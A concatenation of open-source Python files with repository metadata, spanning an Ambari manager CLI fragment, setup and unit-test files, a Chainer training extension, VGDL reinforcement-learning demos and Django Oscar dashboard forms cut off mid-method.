  parser.add_option("--component-list", dest="component_list", default="INFRA_SOLR,RANGER_ADMIN,ATLAS_SERVER,LOGSEARCH_SERVER", type="string", help="comma separated components")
  (options, args) = parser.parse_args()
  # Authenticated request closure shared by every action below.
  accessor = api_accessor(options.host, options.username, options.password, options.protocol, options.port)
  # NOTE(review): this echoes the admin password to stdout.
  print 'Inputs: ' + str(options)
  if options.action == 'configure':
    configure(options, accessor, parser)
  elif options.action == 'install':
    install_service(options, accessor, parser)
  elif options.action == 'start':
    start_service(options, accessor, parser)
  elif options.action == 'stop':
    stop_service(options, accessor, parser)
  elif options.action == 'remove':
    remove_service(options, accessor, parser)
  elif options.action == 'generate-component-hosts':
    generate_component_hosts_ini(options, accessor)
  else:
    parser.print_help()
    print 'action option is wrong or missing'
| {
"content_hash": "75b67f27a058b367339c076dc17b07c7",
"timestamp": "",
"source": "github",
"line_count": 243,
"max_line_length": 194,
"avg_line_length": 49.065843621399175,
"alnum_prop": 0.7139981548268053,
"repo_name": "oleewere/ansible-ambari-manager",
"id": "e786bac353310cd70f399ea02ea0e22a5596bf7f",
"size": "11946",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/ambari_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "52179"
},
{
"name": "Shell",
"bytes": "17076"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
import sys, os
version = '2.3.0'
setup(name='fusionstorbackupstorage',
version=version,
description="ZStack FUSIONSTOR backup storage agent",
long_description="""\
ZStack FUSIONSTOR backup storage agent""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='fusionstor zstack',
author='Frank Zhang',
author_email='xing5820@gmail.com',
url='http://zstack.org',
license='Apache License 2',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=True,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points="""
# -*- Entry points: -*-
""",
)
| {
"content_hash": "16083d52262f0064b654176deb42c809",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 95,
"avg_line_length": 31.153846153846153,
"alnum_prop": 0.6234567901234568,
"repo_name": "live4thee/zstack-utility",
"id": "47596947e18e7ccfa7572de4e6b2fba7404c8609",
"size": "810",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fusionstorbackupstorage/setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AGS Script",
"bytes": "1147"
},
{
"name": "HTML",
"bytes": "4445"
},
{
"name": "Pascal",
"bytes": "187"
},
{
"name": "Puppet",
"bytes": "10417"
},
{
"name": "Python",
"bytes": "2346166"
},
{
"name": "Shell",
"bytes": "241290"
}
],
"symlink_target": ""
} |
"""Tests for manipulating AttachHandle via the DB API"""
from oslo_utils import uuidutils
from cyborg.common import exception
from cyborg.tests.unit.db import base
from cyborg.tests.unit.db import utils
class TestDbAttachHandle(base.DbTestCase):
    """Exercise AttachHandle CRUD operations exposed by the DB API."""

    def test_create(self):
        rand_uuid = uuidutils.generate_uuid()
        created = utils.create_test_attach_handle(self.context,
                                                  uuid=rand_uuid)
        self.assertEqual(rand_uuid, created['uuid'])

    def test_get_by_uuid(self):
        created = utils.create_test_attach_handle(self.context)
        fetched = self.dbapi.attach_handle_get_by_uuid(
            self.context, created['uuid'])
        self.assertEqual(created['uuid'], fetched['uuid'])

    def test_get_by_id(self):
        created = utils.create_test_attach_handle(self.context)
        fetched = self.dbapi.attach_handle_get_by_id(
            self.context, created['id'])
        self.assertEqual(created['id'], fetched['id'])

    def test_update(self):
        created = utils.create_test_attach_handle(self.context)
        updated = self.dbapi.attach_handle_update(
            self.context, created['uuid'], {'attach_type': 'TEST_PCI'})
        self.assertEqual('TEST_PCI', updated['attach_type'])

    def test_list(self):
        expected = [
            utils.create_test_attach_handle(
                self.context, id=idx,
                uuid=uuidutils.generate_uuid())['uuid']
            for idx in range(1, 4)]
        listed = self.dbapi.attach_handle_list(self.context)
        self.assertEqual(sorted(expected),
                         sorted(item.uuid for item in listed))

    def test_list_by_type(self):
        pci_handle = utils.create_test_attach_handle(
            self.context,
            id=1,
            uuid=uuidutils.generate_uuid(),
            attach_type='PCI')
        utils.create_test_attach_handle(
            self.context,
            id=2,
            uuid=uuidutils.generate_uuid(),
            attach_type='TEST_PCI')
        result = self.dbapi.attach_handle_list_by_type(
            self.context, attach_type='PCI')
        self.assertEqual(1, len(result))
        self.assertEqual(pci_handle['uuid'], result[0]['uuid'])

    def test_get_by_filters(self):
        target = utils.create_test_attach_handle(
            self.context,
            id=1,
            uuid=uuidutils.generate_uuid(),
            deployable_id=1)
        utils.create_test_attach_handle(
            self.context,
            id=2,
            uuid=uuidutils.generate_uuid(),
            deployable_id=2)
        result = self.dbapi.attach_handle_get_by_filters(
            self.context, filters={"deployable_id": 1})
        self.assertEqual(1, len(result))
        self.assertEqual(target['uuid'], result[0]['uuid'])

    def test_allocate(self):
        utils.create_test_attach_handle(
            self.context,
            id=1,
            uuid=uuidutils.generate_uuid(),
            deployable_id=1)
        allocated = self.dbapi.attach_handle_allocate(
            self.context, deployable_id=1)
        self.assertTrue(allocated['in_use'])

    def test_delete(self):
        created = utils.create_test_attach_handle(self.context)
        self.assertIsNone(
            self.dbapi.attach_handle_delete(self.context, created['uuid']))

    def test_list_filter_is_none(self):
        """The main test is filters=None. If filters=None,
        it will be initialized to {}, that will return all attach
        handle same as the List Attach Handle API response.
        """
        created = utils.create_test_attach_handle(
            self.context,
            id=1,
            uuid=uuidutils.generate_uuid())
        result = self.dbapi.attach_handle_get_by_filters(
            self.context, filters=None)
        self.assertEqual(1, len(result))
        self.assertEqual(created['uuid'], result[0]['uuid'])

    def test_get_by_uuid_not_exist(self):
        self.assertRaises(exception.ResourceNotFound,
                          self.dbapi.attach_handle_get_by_uuid,
                          self.context, uuidutils.generate_uuid())

    def test_delete_by_uuid_not_exist(self):
        self.assertRaises(exception.ResourceNotFound,
                          self.dbapi.attach_handle_delete,
                          self.context, uuidutils.generate_uuid())

    def test_do_allocate_attach_handle(self):
        # No deployable with this id exists, so allocation must fail.
        missing_dep_id = 100
        self.assertRaises(exception.ResourceNotFound,
                          self.dbapi._do_allocate_attach_handle,
                          self.context, missing_dep_id)
| {
"content_hash": "ad46992d22e4b3d09999b3fac6606cee",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 74,
"avg_line_length": 37.41732283464567,
"alnum_prop": 0.5875420875420876,
"repo_name": "openstack/nomad",
"id": "de0cae3ec83aaa15c9b1b7604890dc338f88b7ac",
"size": "5384",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cyborg/tests/unit/db/test_db_attach_handle.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3238"
}
],
"symlink_target": ""
} |
from __future__ import division
import numpy as np
from chainer.training import extension
class LinearShift(extension.Extension):
    """Trainer extension to change an optimizer attribute linearly.

    This extension changes an optimizer attribute from the first value to the
    last value linearly within a specified duration. The typical use case is
    warming up of the momentum coefficient.

    For example, suppose that this extension is called at every iteration, and
    ``value_range == (x, y)`` and ``time_range == (i, j)``. Then, this
    extension keeps the attribute to be ``x`` up to the ``i``-th iteration,
    linearly shifts the value to ``y`` by the ``j``-th iteration, and then
    keeps the value to be ``y`` after the ``j``-th iteration.

    This extension is also called before the training loop starts by default.

    Args:
        attr (str): Name of the optimizer attribute to adjust.
        value_range (tuple of float): The first and the last values of the
            attribute.
        time_range (tuple of ints): The first and last counts of calls in which
            the attribute is adjusted.
        optimizer (~chainer.Optimizer): Target optimizer object. If it is None,
            the main optimizer of the trainer is used.
    """

    def __init__(self, attr, value_range, time_range, optimizer=None):
        self._attr = attr
        self._value_range = value_range
        self._time_range = time_range
        self._optimizer = optimizer
        self._t = 0
        self._last_value = None

    def initialize(self, trainer):
        # Called once before the training loop: restore the last value when
        # resuming from a snapshot, otherwise start from the t == 0 value.
        optimizer = self._get_optimizer(trainer)
        if self._last_value is not None:
            value = self._last_value
        else:
            value = self._compute_next_value()
        self._update_value(optimizer, value)

    def __call__(self, trainer):
        self._t += 1
        optimizer = self._get_optimizer(trainer)
        value = self._compute_next_value()
        self._update_value(optimizer, value)

    def serialize(self, serializer):
        self._t = serializer('_t', self._t)
        self._last_value = serializer('_last_value', self._last_value)
        if isinstance(self._last_value, np.ndarray):
            # Deserialization may yield a 0-d array; unwrap it to a Python
            # scalar. np.asscalar() was removed in NumPy 1.23, so use the
            # supported ndarray.item() instead.
            self._last_value = self._last_value.item()

    def _get_optimizer(self, trainer):
        # Fall back to the trainer's main optimizer when none was given.
        return self._optimizer or trainer.updater.get_optimizer('main')

    def _compute_next_value(self):
        # Piecewise-linear schedule: clamp at v1 before t1 and at v2 after t2.
        t1, t2 = self._time_range
        v1, v2 = self._value_range

        if self._t <= t1:
            return v1
        elif self._t >= t2:
            return v2
        rate = (self._t - t1) / (t2 - t1)
        return v1 + rate * (v2 - v1)

    def _update_value(self, optimizer, value):
        setattr(optimizer, self._attr, value)
        self._last_value = value
| {
"content_hash": "59e9036a0a2e1cfda9f85a61c32a3dca",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 79,
"avg_line_length": 35.379746835443036,
"alnum_prop": 0.6221824686940965,
"repo_name": "kashif/chainer",
"id": "f021e974115526354b2b26516e61b15447abfa4c",
"size": "2795",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "chainer/training/extensions/linear_shift.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "2730306"
}
],
"symlink_target": ""
} |
from subprocess import *
import os
##
## check datasets
##
print ("// check datasets \\\\")
c = "find ./datasets -name 'out.*' -type f"
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
dataset_files = stdout_value
print "-"*10
##
## check orig graph gpickles
##
c = "find ./datasets -name '*.pickle' -type f"#.format(fname)
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
print "-"*10
##
## check dimacs
##
for f in dataset_files.split("\n"):
fname = os.path.basename(f)
fname = [x for x in fname.split('.') if len(x)>3]
if len(fname) ==1: fname=fname[0]
c = "find ./datasets -name '{}*.dimacs' -type f".format(fname)
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
print "-"*10
##
## check tree decomposition
##
for f in dataset_files.split("\n"):
fname = os.path.basename(f)
fname = [x for x in fname.split('.') if len(x)>3]
if len(fname) ==1: fname=fname[0]
c = "find ./datasets -name '{}*.dimacs.tree' -type f".format(fname)
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
print "-"*10
##
## check production rules
##
for f in dataset_files.split("\n"):
fname = os.path.basename(f)
fname = [x for x in fname.split('.') if len(x)>3]
if len(fname) ==1: fname=fname[0]
c = "find ./ProdRules -name '{}*.prs' -type f".format(fname)
handle = Popen(c, stdin=PIPE, stderr=PIPE, stdout=PIPE, shell=True)
stdout_value = handle.communicate()[0]
print stdout_value
print "-"*10
| {
"content_hash": "1b941f4686063925d4fd5a43cda86166",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 68,
"avg_line_length": 28.049180327868854,
"alnum_prop": 0.6633547632963179,
"repo_name": "nddsg/TreeDecomps",
"id": "1cc3b1d96ddafb288b04f5100a2e7297ac4c350e",
"size": "1711",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xplodnTree/core/treeDecomps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "2829280"
},
{
"name": "Jupyter Notebook",
"bytes": "187050"
},
{
"name": "Python",
"bytes": "612322"
},
{
"name": "R",
"bytes": "1183"
},
{
"name": "Shell",
"bytes": "12336"
},
{
"name": "TeX",
"bytes": "3599"
}
],
"symlink_target": ""
} |
import nova.conf
from nova import context
from nova.tests.functional.api_sample_tests import api_sample_base
CONF = nova.conf.CONF
class FloatingIpsBulkTest(api_sample_base.ApiSampleTestBaseV21):
    """API sample tests for the os-floating-ips-bulk admin extension."""

    ADMIN_API = True
    extension_name = "os-floating-ips-bulk"

    def _get_flags(self):
        flags = super(FloatingIpsBulkTest, self)._get_flags()
        flags['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
        flags['osapi_compute_extension'].append(
            'nova.api.openstack.compute.'
            'contrib.floating_ips_bulk.Floating_ips_bulk')
        return flags

    def setUp(self):
        super(FloatingIpsBulkTest, self).setUp()
        pool = CONF.default_floating_pool
        interface = CONF.public_interface
        # Three addresses: two unassigned, one pinned to a host so the
        # by-host sample has something to list.
        self.ip_pool = [
            {
                'address': address,
                'pool': pool,
                'interface': interface,
                'host': host,
            }
            for address, host in (("10.10.10.1", None),
                                  ("10.10.10.2", None),
                                  ("10.10.10.3", "testHost"))
        ]
        self.compute.db.floating_ip_bulk_create(
            context.get_admin_context(), self.ip_pool)
        self.addCleanup(self.compute.db.floating_ip_bulk_destroy,
                        context.get_admin_context(), self.ip_pool)

    def test_floating_ips_bulk_list(self):
        resp = self._do_get('os-floating-ips-bulk')
        self._verify_response('floating-ips-bulk-list-resp', {}, resp, 200)

    def test_floating_ips_bulk_list_by_host(self):
        resp = self._do_get('os-floating-ips-bulk/testHost')
        self._verify_response('floating-ips-bulk-list-by-host-resp',
                              {}, resp, 200)

    def test_floating_ips_bulk_create(self):
        subs = {"ip_range": "192.168.1.0/24",
                "pool": CONF.default_floating_pool,
                "interface": CONF.public_interface}
        resp = self._do_post('os-floating-ips-bulk',
                             'floating-ips-bulk-create-req', subs)
        self._verify_response('floating-ips-bulk-create-resp', {}, resp, 200)

    def test_floating_ips_bulk_delete(self):
        resp = self._do_put('os-floating-ips-bulk/delete',
                            'floating-ips-bulk-delete-req',
                            {"ip_range": "192.168.1.0/24"})
        self._verify_response('floating-ips-bulk-delete-resp', {}, resp, 200)
| {
"content_hash": "5d56fc7d5f67831451a9fce35f9c6382",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 73,
"avg_line_length": 37.9054054054054,
"alnum_prop": 0.5130124777183601,
"repo_name": "bigswitch/nova",
"id": "0af432e95f4cec13cbc9e31afcc2d05a2088a2e2",
"size": "3409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/tests/functional/api_sample_tests/test_floating_ips_bulk.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "17220528"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "291947"
}
],
"symlink_target": ""
} |
'''
Demonstration of learning how to play a VGDL game, when full state information
is *not* available, only observations are, and furthermore,
we don't have access to a model of the dynamics, only to a finite number of rollout sequences.
We use a neural network controller trained by the SNES algorithm.
@author: Tom Schaul
'''
from vgdl.interfaces import GameEnvironment, GameTask
from pybrain.rl.experiments import EpisodicExperiment
from pybrain.rl.agents import LearningAgent
import pylab
from vgdl.core import VGDLParser
from vgdl.plotting import featurePlot, addTrajectory
#TODO: random starting points
def someEpisodes(game_env, net, discountFactor=0.99, maxSteps=100, avgOver=1, returnEvents=False, exploretoo=True):
    """ Return the fitness value for one episode of play, given the policy defined by a neural network. """
    episode_task = GameTask(game_env)
    game_env.recordingEnabled = True
    game_env.reset()
    net.reset()
    episode_task.maxSteps = maxSteps
    agent = LearningAgent(net)
    agent.learning = False
    agent.logging = False
    experiment = EpisodicExperiment(episode_task, agent)
    total = 0
    for _ in range(avgOver):
        reward_lists = experiment.doEpisodes(1)
        if exploretoo:
            # tiny bonus for visiting more distinct events, acting as a
            # tie-breaker between policies with identical rewards
            total += len(set(game_env._allEvents)) * 1e-6
        # the true, discounted reward
        total += sum(sum(v * discountFactor ** step
                         for step, v in enumerate(r))
                     for r in reward_lists)
    total /= avgOver
    if returnEvents:
        return total, game_env._allEvents
    return total
def buildNet(indim, hidden, outdim=2, temperature=1., recurrent=True):
    """Build a pybrain controller network: linear input -> tanh hidden
    -> sigmoid -> temperature-scaled softmax output.

    Args:
        indim: number of input units (observation dimension).
        hidden: number of hidden tanh units.
        outdim: number of (softmax) action outputs.
        temperature: softmax temperature; lower values sharpen the
            action distribution (the 1/temperature scaling is a fixed,
            non-learnable connection).
        recurrent: if True, add a fully connected hidden->hidden
            recurrent loop (gives the controller memory).

    Returns:
        The sorted (ready-to-use) pybrain network.
    """
    # Import locally so the module can be imported without pybrain's
    # full namespace at top level.
    from pybrain import FullConnection, BiasUnit, TanhLayer, SoftmaxLayer, RecurrentNetwork, LinearLayer, LinearConnection, FeedForwardNetwork, SigmoidLayer
    if recurrent:
        net = RecurrentNetwork()
    else:
        net = FeedForwardNetwork()
    # NOTE: the order modules/connections are added determines the layout
    # of the flat parameter vector that optimizers like SNES search over.
    net.addInputModule(LinearLayer(indim, name = 'i'))
    net.addModule(TanhLayer(hidden, name = 'h'))
    net.addModule(BiasUnit('bias'))
    net.addModule(SigmoidLayer(outdim, name = 'unscaled'))
    net.addOutputModule(SoftmaxLayer(outdim, name = 'o'))
    net.addConnection(FullConnection(net['i'], net['h']))
    net.addConnection(FullConnection(net['bias'], net['h']))
    net.addConnection(FullConnection(net['bias'], net['unscaled']))
    net.addConnection(FullConnection(net['h'], net['unscaled']))
    # Fixed 1/temperature scaling into the softmax; paramdim = 0 removes
    # these weights from the learnable parameter vector.
    lconn = LinearConnection(net['unscaled'], net['o'])
    lconn._setParameters([1./temperature]*outdim)
    # these are fixed.
    lconn.paramdim = 0
    net.addConnection(lconn)
    if recurrent:
        net.addRecurrentConnection(FullConnection(net['h'], net['h']))
    net.sortModules()
    print net
    print 'number of parameters', net.paramdim
    return net
def test1():
from examples.gridphysics.mazes import polarmaze_game, maze_level_1
game_str, map_str = polarmaze_game, maze_level_1
g = VGDLParser().parseGame(game_str)
g.buildLevel(map_str)
game_env = GameEnvironment(g)
print 'number of observations:', game_env.outdim
net = buildNet(game_env.outdim, 2, 2)
for i in range(200):
net.randomize()
net.reset()
print someEpisodes(game_env, net),
if i% 20 == 19:
print
def plotBackground(env, known=None):
    """Plot the reward structure of `env` as a feature map.

    The expensive MDP conversion is computed once and cached across calls
    on the function object itself (replacing the old hidden
    mutable-default-argument cache). Callers may still pass their own
    `known` container (a list holding one list) to manage caching
    explicitly, as before. Note the cache is not keyed by `env`: all
    calls share one conversion, matching the original behavior.
    """
    if known is None:
        known = plotBackground._cache
    if len(known[0]) == 0:
        from vgdl.mdpmap import MDPconverter
        game = env._game
        converter = MDPconverter(game, env=env, verbose=False)
        _, rewards, _ = converter.convert()
        size = (game.width, game.height)
        known[0].append((size, converter.states, rewards))
    featurePlot(*known[0][0])

# explicit cross-call cache (was previously a mutable default argument)
plotBackground._cache = [[]]
def plotTrajectories(env, net, num_traj=5):
cols = ['r', 'c', 'b', 'g', 'y']
for ci in range(num_traj):
fit, alls = someEpisodes(env, net, returnEvents=True)
print fit, len(alls),
if len(alls) == 0:
print 'Oops?'
continue
sseq = [s for s, _, _ in alls]+[alls[-1][-1]]
addTrajectory(sseq, cols[ci%len(cols)])
print
def test2():
    """Train a recurrent controller with SNES on the simple maze,
    plotting intermediate policies in a 3x3 grid of subplots."""
    from examples.gridphysics.mazes import polarmaze_game, maze_level_1
    from pybrain.optimization import SNES
    game = VGDLParser().parseGame(polarmaze_game)
    game.buildLevel(maze_level_1)
    env = GameEnvironment(game, actionDelay=100, recordingEnabled=True)
    net = buildNet(env.outdim, 6, 2)
    algo = SNES(lambda x: someEpisodes(env, x), net, verbose=True,
                desiredEvaluation=0.43)
    rows, cols = 3, 3
    episodesPerStep = 2
    for panel in range(rows * cols):
        pylab.subplot(rows, cols, panel + 1)
        algo.learn(episodesPerStep)
        net._setParameters(algo.bestEvaluable)
        plotBackground(env)
        plotTrajectories(env, net)
        pylab.title(str((panel + 1) * episodesPerStep))
        # stop early once the target fitness is reached
        if algo.desiredEvaluation <= algo.bestEvaluation:
            break
    print
    pylab.show()
def test3():
    """Train a feed-forward controller on the consistent-corridor maze."""
    from examples.gridphysics.mazes.simple import office_layout_2, consistent_corridor
    from examples.gridphysics.mazes import polarmaze_game
    from pybrain.optimization import SNES
    game = VGDLParser().parseGame(polarmaze_game)
    game.buildLevel(consistent_corridor)
    env = GameEnvironment(game)
    net = buildNet(env.outdim, 4, 4, temperature=0.05, recurrent=False)
    algo = SNES(lambda x: someEpisodes(env, x), net, verbose=True,
                desiredEvaluation=0.78)
    rows, cols = 2, 2
    episodesPerStep = 3
    for panel in range(rows * cols):
        pylab.subplot(rows, cols, panel + 1)
        algo.learn(episodesPerStep)
        net._setParameters(algo.bestEvaluable)
        plotBackground(env)
        plotTrajectories(env, net)
        pylab.title(str((panel + 1) * episodesPerStep))
        # stop early once the target fitness is reached
        if algo.desiredEvaluation <= algo.bestEvaluation:
            break
    print
    pylab.show()
# a maze with loops, and simple reactive solution (stay left)
labyrinth2 = """
wwwwwwwwwwwww
w ww ww
w wwww w
w w wwAww ww
w w wwwwGw w
w w ww w
w ww ww w
w w ww
wwwwwwwwwwwww
"""
def test4():
    """SNES on the loopy maze; the best policy is purely reactive."""
    from numpy import ndarray
    from examples.gridphysics.mazes import polarmaze_game
    from pybrain.optimization import SNES, WeightGuessing
    game = VGDLParser().parseGame(polarmaze_game)
    game.buildLevel(labyrinth2)
    env = GameEnvironment(game)
    net = buildNet(env.outdim, 5, 4, temperature=0.1, recurrent=False)
    algo = SNES(lambda x: someEpisodes(env, x, avgOver=3), net, verbose=True,
                desiredEvaluation=0.75)
    # alternative baseline optimizer:
    #algo = WeightGuessing(lambda x: someEpisodes(env, x), net, verbose=True, desiredEvaluation=0.78)
    rows, cols = 2, 2
    episodesPerStep = 4
    for panel in range(rows * cols):
        pylab.subplot(rows, cols, panel + 1)
        algo.learn(episodesPerStep)
        # optimizers may report either a parameter array or a whole network
        if isinstance(algo.bestEvaluable, ndarray):
            net._setParameters(algo.bestEvaluable)
        else:
            net = algo.bestEvaluable
        plotBackground(env)
        plotTrajectories(env, net)
        pylab.title(str((panel + 1) * episodesPerStep))
        if algo.desiredEvaluation <= algo.bestEvaluation:
            break
    print
    pylab.show()
def test5():
from numpy import ndarray
from examples.gridphysics.mazes import polarmaze_game
from pybrain.optimization import SNES
g = VGDLParser().parseGame(polarmaze_game)
g.buildLevel(labyrinth2)
game_env = GameEnvironment(g)
net = buildNet(game_env.outdim, 6, 4, temperature=0.1, recurrent=False)
algo = SNES(lambda x: someEpisodes(game_env, x, avgOver=3, maxSteps=50), net, verbose=True, desiredEvaluation=0.75)
print algo.batchSize
rows, cols = 2,2
episodesPerStep = 5
for i in range(rows*cols):
pylab.subplot(rows, cols, i+1)
algo.learn(episodesPerStep)
if isinstance(algo.bestEvaluable, ndarray):
net._setParameters(algo.bestEvaluable)
else:
net = algo.bestEvaluable
plotBackground(game_env)
plotTrajectories(game_env, net)
pylab.title(str((i+1)*episodesPerStep))
if algo.desiredEvaluation <= algo.bestEvaluation:
break
print
pylab.show()
# a maze that requires memory
cheese_maze = """
wwwwwwwwww
w w
w w ww w w
w wGww wAw
wwwwwwwwww
"""
def test6():
""" Now with memory!"""
from numpy import ndarray
from examples.gridphysics.mazes import polarmaze_game
from pybrain.optimization import SNES
g = VGDLParser().parseGame(polarmaze_game)
g.buildLevel(cheese_maze)
game_env = GameEnvironment(g)
net = buildNet(game_env.outdim, 10, 4, temperature=0.1, recurrent=True)
algo = SNES(lambda x: someEpisodes(game_env, x, avgOver=6, maxSteps=30, exploretoo=False), net, verbose=True, desiredEvaluation=0.85)
print algo.batchSize
rows, cols = 2,3
episodesPerStep = 5
for i in range(rows*cols):
pylab.subplot(rows, cols, i+1)
algo.learn(episodesPerStep)
if isinstance(algo.bestEvaluable, ndarray):
net._setParameters(algo.bestEvaluable)
else:
net = algo.bestEvaluable
plotBackground(game_env)
plotTrajectories(game_env, net)
pylab.title(str((i+1)*episodesPerStep))
if algo.desiredEvaluation <= algo.bestEvaluation:
break
print
pylab.show()
if __name__ == '__main__':
    # Uncomment one of the earlier demos to run it instead of test6.
    #test1()
    #test2()
    #test3()
    #test4()
    #test5()
    test6()
| {
"content_hash": "3b1320b6a3a765b13efd82dcd3210f20",
"timestamp": "",
"source": "github",
"line_count": 288,
"max_line_length": 156,
"avg_line_length": 33.229166666666664,
"alnum_prop": 0.6478578892371996,
"repo_name": "iKrishneel/py-vgdl",
"id": "5c59a20076fb070fbf199ba2388389bf03b31b82",
"size": "9570",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "examples/learning/nomodel_pomdp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "246712"
}
],
"symlink_target": ""
} |
from django import forms
from django.core import exceptions
from django.forms.models import inlineformset_factory
from django.utils.translation import ugettext_lazy as _
from treebeard.forms import movenodeform_factory
from oscar.core.loading import get_class, get_model
from oscar.core.utils import slugify
from oscar.forms.widgets import ImageInput
# Models and classes are resolved dynamically so Oscar's class-loading /
# app-forking mechanism can substitute customised implementations.
Product = get_model('catalogue', 'Product')
ProductClass = get_model('catalogue', 'ProductClass')
ProductAttribute = get_model('catalogue', 'ProductAttribute')
Category = get_model('catalogue', 'Category')
StockRecord = get_model('partner', 'StockRecord')
ProductCategory = get_model('catalogue', 'ProductCategory')
ProductImage = get_model('catalogue', 'ProductImage')
ProductRecommendation = get_model('catalogue', 'ProductRecommendation')
ProductSelect = get_class('dashboard.catalogue.widgets', 'ProductSelect')

# Form for creating/moving categories within the treebeard category tree.
CategoryForm = movenodeform_factory(
    Category,
    fields=['name', 'description', 'image'])
class ProductClassSelectForm(forms.Form):
    """
    Form used before creating a product to select its product class.
    """
    product_class = forms.ModelChoiceField(
        label=_("Create a new product of type"),
        empty_label=_("-- Choose type --"),
        queryset=ProductClass.objects.all())

    def __init__(self, *args, **kwargs):
        """
        Pre-select the product class when exactly one exists and no
        initial data was supplied.
        """
        super(ProductClassSelectForm, self).__init__(*args, **kwargs)
        queryset = self.fields['product_class'].queryset
        if not kwargs.get('initial') and len(queryset) == 1:
            self.fields['product_class'].initial = queryset[0]
class ProductSearchForm(forms.Form):
    """Dashboard search form for filtering products by UPC and title."""
    upc = forms.CharField(max_length=16, required=False, label=_('UPC'))
    title = forms.CharField(
        max_length=255, required=False, label=_('Product title'))

    def clean(self):
        data = super(ProductSearchForm, self).clean()
        # Normalise surrounding whitespace so searches match reliably.
        for field_name in ('upc', 'title'):
            data[field_name] = data[field_name].strip()
        return data
class StockRecordForm(forms.ModelForm):
    """Form for a product's stockrecord, adapted to the product class.

    Stock-tracking fields are removed when the product class does not
    track stock; price/stock fields become required when it does.
    """

    def __init__(self, product_class, user, *args, **kwargs):
        # The user kwarg is not used by stock StockRecordForm. We pass it
        # anyway in case one wishes to customise the partner queryset
        self.user = user
        super(StockRecordForm, self).__init__(*args, **kwargs)

        # Restrict accessible partners for non-staff users
        if not self.user.is_staff:
            self.fields['partner'].queryset = self.user.partners.all()

        # If not tracking stock, we hide the fields
        if not product_class.track_stock:
            # BUGFIX: was 'low_stock_treshold' (typo), which never matched
            # the actual 'low_stock_threshold' field, so that field was
            # incorrectly left on the form for non-stock-tracked products.
            for field_name in ['num_in_stock', 'low_stock_threshold']:
                if field_name in self.fields:
                    del self.fields[field_name]
        else:
            for field_name in ['price_excl_tax', 'num_in_stock']:
                if field_name in self.fields:
                    self.fields[field_name].required = True

    class Meta:
        model = StockRecord
        fields = [
            'partner', 'partner_sku',
            'price_currency', 'price_excl_tax', 'price_retail', 'cost_price',
            'num_in_stock', 'low_stock_threshold',
        ]
# Base inline formset linking StockRecords to a Product; wrapped below by
# StockRecordFormSet to add per-user partner restrictions.
BaseStockRecordFormSet = inlineformset_factory(
    Product, StockRecord, form=StockRecordForm, extra=1)
class StockRecordFormSet(BaseStockRecordFormSet):
    """Stockrecord formset that restricts non-staff users to their own
    partners and requires them to supply at least one own-partner record."""

    def __init__(self, product_class, user, *args, **kwargs):
        self.user = user
        # Non-staff users must end up with a stockrecord for one of
        # their partners (enforced in clean()).
        self.require_user_stockrecord = not user.is_staff
        self.product_class = product_class
        # For non-staff users editing an existing product, limit the
        # visible stockrecords to their own partners -- unless the caller
        # supplied an explicit queryset.
        if not user.is_staff and \
           'instance' in kwargs and \
           'queryset' not in kwargs:
            kwargs.update({
                'queryset': StockRecord.objects.filter(product=kwargs['instance'],
                                                       partner__in=user.partners.all())
            })
        super(StockRecordFormSet, self).__init__(*args, **kwargs)
        self.set_initial_data()

    def set_initial_data(self):
        """
        If user has only one partner associated, set the first
        stock record's partner to it. Can't pre-select for staff users as
        they're allowed to save a product without a stock record.

        This is intentionally done after calling __init__ as passing initial
        data to __init__ creates a form for each list item. So depending on
        whether we can pre-select the partner or not, we'd end up with 1 or 2
        forms for an unbound form.
        """
        if self.require_user_stockrecord:
            try:
                user_partner = self.user.partners.get()
            except (exceptions.ObjectDoesNotExist,
                    exceptions.MultipleObjectsReturned):
                pass
            else:
                partner_field = self.forms[0].fields.get('partner', None)
                if partner_field and partner_field.initial is None:
                    partner_field.initial = user_partner

    def _construct_form(self, i, **kwargs):
        # Forward the extra constructor args each StockRecordForm expects.
        kwargs['product_class'] = self.product_class
        kwargs['user'] = self.user
        return super(StockRecordFormSet, self)._construct_form(
            i, **kwargs)

    def clean(self):
        """
        If the user isn't a staff user, this validation ensures that at least
        one stock record's partner is associated with a users partners.
        """
        if any(self.errors):
            return
        if self.require_user_stockrecord:
